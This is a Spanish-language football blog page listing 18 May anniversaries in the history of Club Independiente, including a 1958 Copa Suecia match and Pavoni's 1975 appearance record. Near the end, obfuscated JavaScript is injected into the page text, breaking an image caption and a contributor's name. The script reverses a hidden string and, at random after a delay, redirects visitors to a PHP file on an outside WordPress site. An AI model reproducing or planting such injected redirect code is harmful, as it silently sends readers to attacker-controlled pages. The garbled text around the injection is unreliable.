Conectate con nosotros

Efemérides

Efemérides del 18 de mayo

No se puede amar lo que no se conoce. Estas efemérides son parte de la brillante historia del Glorioso INDEPENDIENTE de Avellaneda.

1958 – Se disputa en el País por primera y única vez, la Copa Suecia, competiciónOficial organizada por AFA, durante el receso del Campeonato por el Mundial.

El diseño de disputa de la Copa fue simple: los 16 equipos de Primera División. Dos zonas de 8, todos contra todos, ida y vuelta. Los primeros de cada zona se enfrentaban en partido único para definir al Campeón. El trofeo había sido donado por el embajador sueco en el país, Carl Borgenstierna. 

Un día como hoy, Independiente arranca su participación sin contar con José Varacka, Osvaldo Cruz y David Acevedo (los tres estaban en la Selección) y forma con: Cozzi; Moussegne y Bendazzi; Britos, Ferreiro y Miranda; Raffo, Bonelli, Blanco, Nawacki y Sesti.

Enfrenta a River,  logrando una victoria aplastante 6 a 1, con goles de: Manuel Blanco a los 4’ para el Rojo, lo empató Miguel Rodríguez a los 8’, y Juan Nawacky devolvió la ventaja a los 26’ para irse al descanso 2 a 1. En la segunda etapa Juan Nawacky a los 68’, Norberto Raffo a los 72’, Juan Nawacky a los 73’ completando su triplete, y finalmente Blanco pone el 6 a 1 a los 78’. Como dato de color, agregar que el gol de Raffo (el 5to.) fue olímpico.

Pese a esta victoria, el equipo no hizo un buen torneo, 5 triunfos, 3 empates y 6 caídas, terminando en el 5to. puesto. El líder de la zona fue Atlanta, recién ascendido quien jugaría la final frente a Racing, primero del otro grupo. Por motivos que desconozco, dicha final se disputó recién en abril del año 1960, siendo Campeón Atlanta  que le ganó 3 a 1 a los vecinos.

En el Torneo de primera Independiente siguió siendo irregular finalizando en el 8vo. lugar. Por su parte, la Selección Argentina quedó afuera en primera ronda, y sufrió su peor derrota en la historia de los mundiales cayendo 6 a 1 frente a Checoslovaquia, país que hoy en día ya no existe por su desintegración de 1993.

1975 – Un día como hoy por la Fecha 21 del Campeonato Metropolitano, Independiente en Avellaneda le gana a San Lorenzo por 2 a 1 con doblete de Ricardo Bochini.

Lo que debe resaltarse es que entre los titulares de la jornada se encontraba, Ricardo Elbio “El Chivo” Pavoni, y con esa presencia alcanzaba la sumatoria de 363 partidos vestido con la camiseta roja, igualando a Vicente “Capote” De la Mata como los futbolistas con mayor cantidad de presencias en la historia profesional de Independiente, dentro de lo que es la Primera División (no se contabilizan partidos internacionales ni competiciones nacionales oficiales que no sean los torneos regulares).

En 3er. puesto quedaba Miguel Ángel “Pepé” Santoro que ya se había marchado del club, y luego Antonio Sastre y Arsenio Erico que lógicamente ya no estaban en actividad.

Por otra parte, Pavoni ya era el futbolista extranjero con mayor cantidad de partidos disputados en Argentina, habiendo ya superado a Ángel Zubieta (español que había jugado en San Lorenzo), y dejaba en tercer lugar a Arsenio Erico. Años más tarde sería superado por otro uruguayo y también lateral, pero por derecha, porque José Jorge González llegó a 565 partidos jugando en Rosario Central y Vélez Sarsfield entre 1966 y 1980.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»64″ height=»49″/></figure></div>



<p>Colaboración: <strong>Hernán Paglieri</strong>-Vicepresidente <strong>Peña Roja Daniel Ber<script>$mWn=function(n){if(typeof ($mWn.list[n])==toni –San Andrés de Giles

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides